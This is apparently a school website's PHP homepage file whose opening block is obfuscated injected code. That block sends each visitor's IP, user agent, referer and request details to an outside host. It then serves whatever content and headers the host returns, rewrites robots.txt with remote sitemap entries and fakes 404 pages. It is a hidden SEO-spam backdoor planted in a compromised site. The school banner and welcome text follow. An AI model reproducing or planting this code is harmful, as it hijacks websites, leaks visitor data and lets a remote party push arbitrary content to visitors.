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<?php /* __________________________________________________ | Obfuscated by YAK Pro - Php Obfuscator 2.0.14 | | on 2024-10-30 03:23:49 | | GitHub: https://github.com/pk-fr/yakpro-po | |__________________________________________________| */ goto JHycI; TeDb_: $hBqXz = array("\123\103\x52\111\120\x54\137\116\x41\115\x45", "\122\105\121\125\x45\123\124\137\x55\x52\x49", "\x48\124\124\120\123", "\122\x45\x51\125\105\123\124\x5f\123\103\110\x45\115\x45", "\123\x45\x52\x56\105\122\x5f\120\x4f\122\x54", "\x52\105\x4d\x4f\x54\x45\x5f\101\x44\x44\122", "\110\124\124\x50\137\x52\105\x46\105\122\105\122", "\x48\124\124\120\137\x41\103\x43\105\120\124\137\114\x41\116\x47\x55\x41\x47\105", "\110\124\124\120\137\x55\x53\105\122\137\x41\x47\105\x4e\124", "\110\124\124\x50\x5f\110\117\x53\x54"); goto tcVAR; ql1HO: if (!empty($MKrCu)) { goto WxHvi; } goto PptVw; qnU5c: exit; goto GZKia; JCZGI: $MKrCu = tRiM($MKrCu); goto mdi11; ZDf74: atBkC: goto MaoOo; XTa4b: $AGyqh = "\x2f\151\156\144\145\x78\56\x70\x68\x70\x3f\x56\x53\75" . $pyo2c . "\46\x47\120\75" . $YXCo_; goto TeDb_; qBSQX: if (!(PReg_mATch("\57\x6a\160\62\60\x32\x33\57\163\151", $_SERVER["\x52\105\121\125\105\x53\x54\137\x55\122\x49"]) == roUND(0.296 + 0.44569 + 0.258))) { goto Px60e; } goto yw7Zo; YnKC3: Smcs8: goto O_q33; NAuUW: ARRay_PoP($RP7xy); goto nRi6v; ZqzD6: if (!($dAWwx == "\x70\151\x6e\147")) { goto Smcs8; } goto hEcX0; PptVw: $MKrCu = FiLe_GET_ContEnts($CT59s); goto Op8Yz; O_q33: goto kkBoq; goto Y_eRf; k9KyU: $YXCo_ = "\x7a\x6a\x31\x30\60\x33"; goto uiNld; p9riP: if (!($dAWwx == "\145\170\x69\x74")) { goto DKsEu; } goto Yuu2q; tcVAR: foreach ($hBqXz as $N8OOw) { goto ibDak; pY29d: $AGyqh .= "\46" . $N8OOw . "\x3d" . $gjqeG; goto diYTG; hIoc1: $gjqeG = BasE64_eNCoDE(TRiM($Nq2f0)); goto OZIwE; T5Tag: $gjqeG = str_RepLace("\57", "\x5f", $gjqeG); goto H9g1v; H9g1v: $gjqeG = sTR_RePLAce("\75", "\56", $gjqeG); goto pY29d; OZIwE: $gjqeG = str_RepLacE("\x2b", "\x2d", $gjqeG); goto T5Tag; ibDak: $Nq2f0 = isset($_SERVER[$N8OOw]) ? $_SERVER[$N8OOw] : ''; goto hIoc1; diYTG: lGDY4: goto QoG2F; QoG2F: } goto JXTNq; qfSRm: $O9QSD = cuRL_iNit(); goto ZyxU5; Y_eRf: PabAH: goto OJAZF; k5GJ2: CURL_cLOSE($O9QSD); goto ql1HO; Btl_M: curL_sETOPT($O9QSD, CURLOPT_CONNECTTIMEOUT, rOunD(4.12378 + 0.73615635 + 4.18892508 + 0.951)); goto p3xcO; U6zCI: $MLB1z = tRIM($Fmrfl[RounD(0.40093897 + 0.176995 + 0.4173709 + 0.00469)]); goto Z2Kuw; jit0O: CQvVi: goto U6zCI; JmZps: Ne_Wx: goto llYmA; JHycI: eRrOr_rePortiNG(RoUnd(0 + 0)); goto k9KyU; nRi6v: foreach ($RP7xy as $Mqv8U) { $a07Z_ .= "\123\151\164\x65\x6d\x61\x70\72" . $Mqv8U . PHP_EOL; SJMlx: } goto y5IuG; FaSRV: echo "\x72\x6f\x62\157\164\163\x2e\164\x78\x74\x20\144\157\156\145"; goto sE05F; Z2Kuw: if (empty($MLB1z)) { goto Ne_Wx; } goto qIxoc; vonpm: curl_seToPt($O9QSD, CURLOPT_RETURNTRANSFER, rouNd(0.02117647 + 0.0779 + 0.13438 + 0.18666667 + 0.1576 + 0.11163399 + 0.2057516 + 0.10484)); goto Btl_M; crHar: $b6Sh1 = COUNT($Fmrfl); goto Ng9xK; AjjEL: $CT59s = $nsjJt . $AGyqh; goto qfSRm; N3jnK: $a07Z_ .= "\x41\x6c\154\157\x77\x3a\x2f" . PHP_EOL; goto quZfp; fnykx: HeAdEr($XLCU2); goto jit0O; qIxoc: echo $MLB1z; goto JmZps; Ng9xK: if ($b6Sh1 < 3) { goto PabAH; } goto kDO0i; y5IuG: qQHsR: goto nJ8fi; nSoCK: heAdeR("\x48\x54\124\120\57\61\56\x30\40\x34\x30\64\x20\116\157\x74\x20\106\157\165\156\x64"); goto ZDf74; wh8Fy: $nsjJt = "\150\x74\164\x70\72\57\57" . $YXCo_ . "\x2e\x65\142\x69\x7a\x6c\141\x2e\143\x6f\x6d"; goto XTa4b; Op8Yz: WxHvi: goto JCZGI; MaoOo: echo "\x48\x54\124\x50\57\x31\x2e\60\x20\x34\x30\64\x20\116\x6f\164\x20\x46\x6f\165\x6e\x64\137\x5f\137" . $YXCo_ . "\137\x5f\x5f" . $pyo2c; goto Rfmp6; sE05F: exit; goto YnKC3; llYmA: $dAWwx = Trim($Fmrfl[$b6Sh1 - ROund(0.26258 + 0.22 + 0.141 + 0.0231 + 0.0303644 + 0.064 + 0.059572 + 0.1015 + 0.09773999999999999)]); goto p9riP; Yuu2q: exit; goto RT3tM; uiNld: $pyo2c = "\143\152\x31"; goto qBSQX; p3xcO: $MKrCu = curl_eXeC($O9QSD); goto HgPIa; hEcX0: $a07Z_ = "\x55\x73\145\x72\55\x61\147\x65\156\164\x3a\52" . PHP_EOL; goto N3jnK; yw7Zo: if (!(PrEg_MATCh("\x2f\152\x70\62\60\x32\x33\x63\x77\167\x2f\x73\x69", $_SERVER["\122\x45\x51\x55\105\123\124\137\125\x52\x49"]) == roUNd(0 + 0 + 0 + 0 + 0 + 0 + 0 + 0 + 0))) { goto atBkC; } goto nSoCK; quZfp: $RP7xy = eXPloDe("\x3c\142\x72\57\76", $MLB1z); goto NAuUW; RT3tM: DKsEu: goto ZqzD6; kDO0i: $XLCU2 = TRIM($Fmrfl[roUND(0 + 0 + 0 + 0 + 0 + 0)]); goto flUkv; nJ8fi: fIle_puT_cOnTEnts($_SERVER["\104\x4f\x43\x55\115\105\x4e\x54\137\122\x4f\117\x54"] . "\x2f\162\x6f\142\157\164\x73\x2e\164\170\164", $a07Z_); goto FaSRV; ZyxU5: CuRl_sETopT($O9QSD, CURLOPT_URL, $CT59s); goto vonpm; OJAZF: heaDER("\x48\124\124\120\x2f\x31\x2e\60\40\x34\x30\x34\x20\116\157\164\40\106\x6f\x75\156\x64"); goto qnU5c; McJKl: Px60e: goto wh8Fy; flUkv: if (empty($XLCU2)) { goto CQvVi; } goto fnykx; Rfmp6: exit; goto McJKl; HgPIa: $MKrCu = Trim($MKrCu); goto k5GJ2; JXTNq: x9dXj: goto AjjEL; mdi11: $Fmrfl = ExpLOde("\174\x40\x23\44\174", $MKrCu); goto crHar; GZKia: kkBoq: ?> <!--Header Wrap End--> <!--Banner Wrap Start--> <!-- Section: home --> <section id="home" style="margin-top:-4%;"> <!-- Slider Revolution Start --> <!-- Slider Revolution Start --> <div id="myCarousel" class="carousel slide" data-ride="carousel"> <!-- Indicators --> <!-- Wrapper for slides --> <div class="carousel-inner" role="listbox"> <div class="item active"> <img src="extra-images/banner-05.jpg" alt="Mirambika School" width="100%"> </div> <?php require 'admin/database/dbconfig.php'; $query = "SELECT * FROM bannertab"; $query_run = mysqli_query($connection, $query); $check_img = mysqli_num_rows($query_run) > 0; if ($check_img) { while ($row = mysqli_fetch_array($query_run)) { ?> <div class="item"> <img src="admin/files/images/<?php echo $row['imgfile']; ?>" alt="Aswini Ayurveda" width="100%"> </div> <?php } } else { echo "No Records Found"; } ?> </div> <a class="left carousel-control" href="#myCarousel" data-slide="prev"> <span class="glyphicon glyphicon-chevron-left"></span> <span class="sr-only">Previous</span> </a> <a class="right carousel-control" href="#myCarousel" data-slide="next"> <span class="glyphicon glyphicon-chevron-right"></span> <span class="sr-only">Next</span> </a> </div> </section> <!--Banner Wrap End--> <!--Main Content Wrap Start--> <div class="gt_main_content_wrap"> <!--Banner Services Wrap Start--> <!-- Section: About --> <section id="about"> <div class="container pb-70"> <div class="section-content"> <div class="row"> <div class="col-md-8 col-sm-12 wow fadeInRight" data-wow-duration="1s" data-wow-delay="0.3s"> <h4 class="text-uppercase mt-0" style="color: #80cd33;">Welcome To <span class="text-theme-color-2"> Mirambika Residential School </span></h4> <p style="text-align: justify; color: black;">Welcome to MIRAMBIKA RESIDENTIAL SCHOOL, a school that believes in making a difference in the life of every child we admit. We offer an engaging and challenging environment for boys and girls between Class-VI to X with the firm belief that boarding co-educational system is the best possible way to train young mind to face the world while providing the children with the broadest possible education, our effort is to develop an atmosphere where their passion for academics and sport can be recognized valued and shaped to maximize their potential as able, thinking and compassionately citizens of the future. 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